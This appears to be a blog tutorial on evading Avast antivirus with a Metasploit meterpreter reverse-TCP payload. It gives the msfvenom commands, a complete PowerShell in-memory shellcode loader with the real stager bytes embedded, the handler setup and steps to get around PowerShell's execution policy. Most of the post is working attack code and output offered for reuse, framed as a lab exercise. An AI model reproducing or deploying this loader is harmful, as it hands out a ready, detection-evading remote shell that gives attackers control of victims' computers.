In 2022 viruses are something we run into all the time. They attack our devices, and antivirus software is the main thing standing between them and us. You could say that with an antivirus installed, malware, adware and viruses in general cannot get at our machine. But what if we can bypass the antivirus so that our own program runs without being detected?
In this post I will set up a lab test to bypass Avast antivirus, using the current Avast version. First I generate a plain payload with:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe
We upload it to VirusTotal and get the result shown in the picture. (Keep in mind that anything uploaded to VirusTotal is shared with the antivirus vendors, so a payload you intend to reuse should not be uploaded there.)
As you can see, our shell is flagged by the antivirus engines. Now we run it on a Windows machine with Avast installed to confirm that it is detected there too.
Confirmed: Avast detects it. Next we build the payload in PowerShell format (a .ps1 file) with some additional code to get it past Avast.
Follow the script below and insert your own shellcode, generated with:
Payload for 32-bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Payload for 64-bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
script code:
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
# Compile the P/Invoke wrappers; -passthru returns the generated type so it can be called as $winFunc::Function().
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
# This bare type literal does nothing except print the IsPublic/IsSerial/Name/BaseType table seen in the output later.
[Byte[]];
# Paste the msfvenom -f powershell output here (msfvenom names the array $buf; rename it to $sc).
# The array below is the 32-bit reverse_tcp stager for 192.168.1.7:4444 from the command above.
[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
# Allocate at least one page as RWX: MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40).
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
# Copy the shellcode one byte at a time. memset returns the destination pointer, which is where the
# numbers printed after the script starts come from. ToInt64 (not ToInt32) so the 64-bit variant does
# not throw an OverflowException when VirtualAlloc hands back an address above 4 GB.
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)};
# Run the stager on a new thread and keep the PowerShell process alive so the session stays up.
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
Now we upload the script to VirusTotal again; the result looks like this:
Avast does not flag it as a threat, although 6 other engines do. Next we scan the file with Avast itself, with the file already on the Windows box.
The file is not flagged as a virus or threat. Passing an on-demand file scan only shows that the static signatures miss the script; whether it survives being executed is the next test. Before running it, start the Metasploit handler. LHOST and LPORT must match the values baked into the shellcode (192.168.1.7:4444 in the msfvenom commands above). Note that the handler transcript below is listening on port 7788: a payload built with LPORT=4444 will never reach it, so run "set lport 4444" as well, unless you regenerated the payload with 7788.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp       # for the 32-bit payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp   # for the 64-bit payload (pick one)
msf6 exploit(multi/handler) > set lhost 192.168.1.7   # YOUR IP, the same LHOST you gave msfvenom
lhost => 192.168.1.7
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.7      yes       The listen address (an interface may be specified)
   LPORT     7788             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.7:7788
Next we execute the payload on Windows, as shown below:
Above we can see that the script does not run because of PowerShell's execution policy, not because of the antivirus. The execution policy is not a security boundary; it only decides whether PowerShell will load a script file from disk, and it can be set per user or overridden for a single process. Here we change the CurrentUser scope so our script is allowed to run.
Run the following:
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help
topic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Unrestricted
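As an added example (not part of the original post), the same result without leaving a persistent policy change on the lab machine: the execution policy is overridden for one child process only, the "Security warning" prompt seen later is avoided by clearing the Zone.Identifier mark that Windows attaches to downloaded files, and the CurrentUser change from the post is undone afterwards. The script path is assumed to be C:\Users\User\Desktop\avtest.ps1 as in the post.

```powershell
# Added example, not from the original post. Assumes the script lives where the post keeps it.
$script = 'C:\Users\User\Desktop\avtest.ps1'

# Show every scope. MachinePolicy and UserPolicy come from Group Policy and take precedence,
# so a Set-ExecutionPolicy -Scope CurrentUser can still be overridden on a domain-joined box.
Get-ExecutionPolicy -List

# Remove the "downloaded from the internet" mark (NTFS Zone.Identifier stream); this is what
# triggers the "Run only scripts that you trust" prompt when the file was copied from a browser.
Unblock-File -Path $script

# Per-process override: only this child powershell.exe ignores the policy; nothing is changed on disk.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $script

# If Set-ExecutionPolicy -Scope CurrentUser was used as in the post, put the scope back to Undefined
# once the lab is finished so the policy does not stay Unrestricted.
Set-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser -Force
```

For the x86 payload on 64-bit Windows, replace powershell.exe above with the 32-bit host at C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; the -ExecutionPolicy Bypass switch is the same.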
With the policy changed, we run the payload again:
C:\WINDOWS\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\
PS C:\Users\User\Desktop> .\avtest.ps1
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"): R
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True True Byte[] System.Array
447807488
447807489
447807490
447807491
447807492
447807493
447807494
447807495
447807496
447807497
447807498
447807499
447807500
447807501
447807502
447807503
447807504
447807505
447807506
.................
If you see output like the above and the program does not go into "not responding", the exploit has succeeded and the session comes in as shown below:
That is as far as this post goes; try it in your own lab, and if you run into problems leave a comment below.